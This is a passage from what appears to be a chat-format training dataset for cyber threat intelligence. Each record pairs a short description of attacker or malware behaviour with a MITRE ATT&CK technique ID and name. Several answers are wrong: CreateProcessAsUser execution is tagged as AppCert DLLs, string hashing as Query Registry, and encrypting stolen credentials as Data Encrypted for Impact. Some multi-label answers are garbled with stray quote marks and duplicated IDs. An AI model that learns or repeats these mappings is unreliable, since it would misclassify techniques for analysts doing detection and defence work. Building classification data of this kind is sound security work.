- "content": "Kimsuky has obtained exploit code for various CVEs."
- },
- {
- "role": "assistant",
- "content": "T1588.005 - Exploits"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WastedLocker can enumerate removable drives prior to the encryption process."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "With the upsurgence of ProxyShell, webshells have become more common entry points."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell', 'T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Honeybee's service-based DLL implant can execute a downloaded file with parameters specified using \"CreateProcessAsUser\"."
- },
- {
- "role": "assistant",
- "content": "T1546.009 - Event Triggered Execution: AppCert DLLs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ROKRAT can request to delete files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BokBot achieves malicious payload execution by abusing a renamed copy of the legitimate WMIC utility, which will execute a XSL script file. The entire process is outlined below."
- },
- {
- "role": "assistant",
- "content": "T1220 - XSL Script Processing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT3 has a tool that can enumerate the permissions associated with Windows groups."
- },
- {
- "role": "assistant",
- "content": "T1069 - Permission Groups Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used an audio capturing utility known as SOUNDWAVE that captures microphone input."
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WIRTE has used `regsvr32.exe` to trigger the execution of a malicious script."
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has used a custom hashing method to resolve APIs used in shellcode."
- },
- {
- "role": "assistant",
- "content": "T1027.007 - Obfuscated Files or Information: Dynamic API Resolution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Moses Staff has built malware, such as DCSrv and PyDCrypt, for targeting victims' machines."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IcedID has been delivered via phishing e-mails with malicious attachments."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bundlore has disguised a malicious .app file as a Flash Player update."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DRATzarus can collect information from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GetST.py: Given a password, hash, aesKey or TGT in ccache, this script will request a Service Ticket and save it as ccache. If the account has constrained delegation (with protocol transition) privileges you will be able to use the -impersonate switch to request the ticket on behalf another user. GetPac.py: This script will get the PAC (Privilege Attribute Certificate) structure of the specified target user just having a normal authenticated user credentials. It does so by using a mix of [MS-SFU]’s S4USelf + User to User Kerberos Authentication. GetUserSPNs.py: This example will try to find and fetch Service Principal Names that are associated with normal user accounts. Output is compatible with JtR and HashCat. GetNPUsers.py: This example will attempt to list and get TGTs for those users that have the property ‘Do not require Kerberos preauthentication’ set (UF_DONT_REQUIRE_PREAUTH). Output is compatible with JtR. ticketConverter.py: This script will convert kirbi files, commonly used by mimikatz, into ccache files used by Impacket, and vice versa. raiseChild.py: This script implements a child-domain to forest privilege escalation by (ab)using the concept of Golden Tickets and ExtraSids"
- },
- {
- "role": "assistant",
- "content": "T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Koadic can gather hashed passwords by dumping SAM/SECURITY hive."
- },
- {
- "role": "assistant",
- "content": "T1003.002 - OS Credential Dumping: Security Account Manager"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of accessing locally stored passwords on victims."
- },
- {
- "role": "assistant",
- "content": "T1552.001 - Unsecured Credentials: Credentials In Files"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AuTo Stealer can store collected data from an infected host to a file named `Hostname_UserName.txt` prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Retrieves the following data from the system by leveraging Windows Management Instrumentation (WMI) queries and environment variables: IP Address from Network Adapter Configuration OS Name OS Architecture Computer Name Computer Domain Name Username - IP Address from Network Adapter Configuration - OS Name - OS Architecture - Computer Name - Computer Domain Name - Username"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation', 'T1082 - System Information Discovery', 'T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MacMa exfiltrates data from a supplied path over its C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MegaCortex loads \"injecthelper.dll\" into a newly created \"rundll32.exe\" process."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ragnar Locker has attempted to terminate/stop processes and services associated with endpoint security products."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Reaver continues to collect various information from the victim machine, including the following: Computer name Volume serial number Microsoft Windows version CPU speed ANSI code page OEM code page identifier for the operating system Physical and virtual memory information Reaver encrypts this data using an incremental XOR key and uploads it to the configured remote server on the port specified"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has sent spearphishing emails in an attempt to lure users to click on a malicious link."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RainyDay can use the QuarksPwDump tool to obtain local passwords and domain cached credentials."
- },
- {
- "role": "assistant",
- "content": "T1555.004 - Credentials from Password Stores: Windows Credential Manager"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POORAIM can enumerate processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has used shell scripts for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.004 - Command and Scripting Interpreter: Bash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "All this information was then sent to one of the following domains: G1 also had the ability to execute commands remotely on the infected host machine at the author's will"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Below is an example of anti-analysis technique showing the loader checking if the victim system is a Vmware or VirtualBox VM"
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The backdoor will load the encrypted configuration file and decrypt it, then use Secure Sockets Layer (SSL) protocol to connect to command-and-control (C&C) servers"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The loaded module is a simple dropper. Upon loading the module, the AutoOpen method will be invoked. The malicious code in this method drops the final payload executable into %AppData%\\service.exe and executes it (see Figure 6)"
- },
- {
- "role": "assistant",
- "content": "T1574.005 - Executable Installer File Permissions Weakness', 'T1574 - Hijack Execution Flow', 'T1569.002 - System Services: Service Execution', 'T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adds newly created accounts to the administrators group to maintain elevated access."
- },
- {
- "role": "assistant",
- "content": "T1098 - Account Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Peppy can take screenshots on targeted systems."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actors used two Impacket tools: wmiexec.py and smbexec.py."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It then launches player.exe, a CozyDuke dropper maintaining anti-detection techniques: 3d3363598f87c78826c859077606e514,player.exe,338kb,Trojan.Win32.CozyBear.v,CompiledOn:2014.07.02 21:13:33 Anti-detection and trojan functionality The file collects system information, and then invokes a WMI instance in the root\\securitycenter namespace to identify security products installed on the system, meaning that this code was built for x86 systems, wql here: SELECT * FROM AntiVirusProduct SELECT * FROM FireWallProduct The code hunts for several security products to evade: CRYSTAL KASPERSKY SOPHOS DrWeb AVIRA COMODO Dragon In addition to the WMI/wql use, it also hunts through the “SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\” registry key looking for security products to avoid"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery', 'T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound has established email accounts using fake personas for spearphishing operations."
- },
- {
- "role": "assistant",
- "content": "T1585.002 - Email Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FELIXROOT collects a list of running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In addition to the encrypted strings table, BitPaymer replaces the remaining strings in the binary with hashes and uses an algorithm to match these hashes with strings that exist on the host. This hash is combined with a DWORD using a simple XOR. This string hashing algorithm is identical to the hashing algorithm used in other Dridex modules"
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SLOTHFULMEDIA can enumerate open ports on a victim machine."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "menuPass has used certutil in a macro to decode base64-encoded content contained in a dropper document attached to an email. The group has also used \"certutil -decode\" to decode files on the victim’s machine when dropping UPPERCUT."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Iranian attacker group (APT35) and the Chinese attacker group (APT31) targeted campaign staffers’ personal emails with credential phishing emails and emails containing tracking links. As part of our wider tracking of APT31 activity, we've also seen them deploy targeted malware campaigns"
- },
- {
- "role": "assistant",
- "content": "T1598 - Phishing for Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Winnti for Windows can check for the presence of specific files prior to moving to the next phase of execution."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has used a AMSI bypass, which patches the in-memory amsi.dll, in PowerShell scripts to bypass Windows antimalware products."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EVILNUM can execute commands and scripts through rundll32."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware utilizes several persistence mechanisms including scheduled tasks, Userinit and Run registry keys in the HKLM hive"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has searched for rival malware and removes it if found. TeamTNT has also searched for running processes containing the strings aliyun or liyun to identify machines running Alibaba Cloud Security tools."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PROMETHIUM has used a script that configures the knockd service and firewall to only accept C2 connections from systems that use a specified sequence of knock ports."
- },
- {
- "role": "assistant",
- "content": "T1205.001 - Port Knocking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ProLock can use BITS jobs to download its malicious payload."
- },
- {
- "role": "assistant",
- "content": "T1197 - BITS Jobs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After downloading and executing these files, one of the child processes created other files and the executable setup.exe/setup-installv1.3.exe, which was extracted from 320yea_Teamviewer_15206.zip via WinRAR.exe. This file seems to be the source of most of the downloaded malicious files, as seen in the following figure."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The URIs used in the HTTP requests are randomly generated"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DES-encrypts captured credentials using the key 12345678 before writing the credentials to a log file."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "sent shortened URL links over email to victims. The URLs linked to Word documents with malicious macros that execute PowerShells scripts to download Pupy."
- },
- {
- "role": "assistant",
- "content": "T1598.003 - Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cyclops Blink has the ability to execute on device startup, using a modified RC script named S51armled."
- },
- {
- "role": "assistant",
- "content": "T1037.004 - Boot or Logon Initialization Scripts: Rc.common"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 used HTTP for C2 and data exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RAT is able to open a command shell."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "identifies files and directories for collection by searching for specific file extensions or file modification time."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The optional HTTP data with king.jpg looks like a beacon to inform the control server that the malware is ready to accept new commands: Commands received from the control server are encoded DWORDs After decoding, these DWORDs should be in the range 123459h to 123490h Malware checking to make sure a received command is in the correct range"
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BLUELIGHT has a XOR-encoded payload."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actors collected email from Office 365 using a compromised valid service account with elevated privileges."
- },
- {
- "role": "assistant",
- "content": "T1114.002 - Email Collection: Remote Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KOCTOPUS has used `cmd.exe` and batch files for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The SysInfo plugin runs a selection of basic reconnaissance commands on the victim's machine via a cmd.exe process"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "netbook or inexpensive laptop - Raspberry Pi computer - Bash Bunny, a special tool for carrying out USB attacks"
- },
- {
- "role": "assistant",
- "content": "T1200 - Hardware Additions"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RDAT can take a screenshot on the infected system."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kinsing has used SSH for lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1021.004 - Remote Services: SSH"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ecipekac has the ability to decrypt fileless loader modules."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mimikatz’s \"LSADUMP::DCSync\" and \"KERBEROS::PTT\" modules implement the three steps required to extract the krbtgt account hash and create/use Kerberos tickets."
- },
- {
- "role": "assistant",
- "content": "T1550.003 - Use Alternate Authentication Material: Pass the Ticket"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MegaCortex has added entries to the Registry for ransom contact information."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the analyzed sample the RAT component was named “BotDLL[.]dll”. It has some typical RAT functionality such as command shell, video recording of the screen, remote desktop, port forwarding, and file system access"
- },
- {
- "role": "assistant",
- "content": "T1125 - Video Capture', 'T1090 - Proxy', 'T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crimson can capture webcam video on targeted systems."
- },
- {
- "role": "assistant",
- "content": "T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The webshell will save the archives locally to the server in the C:\\Users\\Public\\Libraries\\Recorded\\Files folder, each with a filename with the following structure: [IP address]_c$_Users_[username]__[Desktop-Documents-Downloads]_[year]-[month]-[day]-[hours]-[minutes]-[seconds].7z It is likely that the threat actors use this functionality to rapidly check for new files created by users on the network"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has created accounts on multiple compromised hosts to perform actions within the network."
- },
- {
- "role": "assistant",
- "content": "T1136.001 - Create Account: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
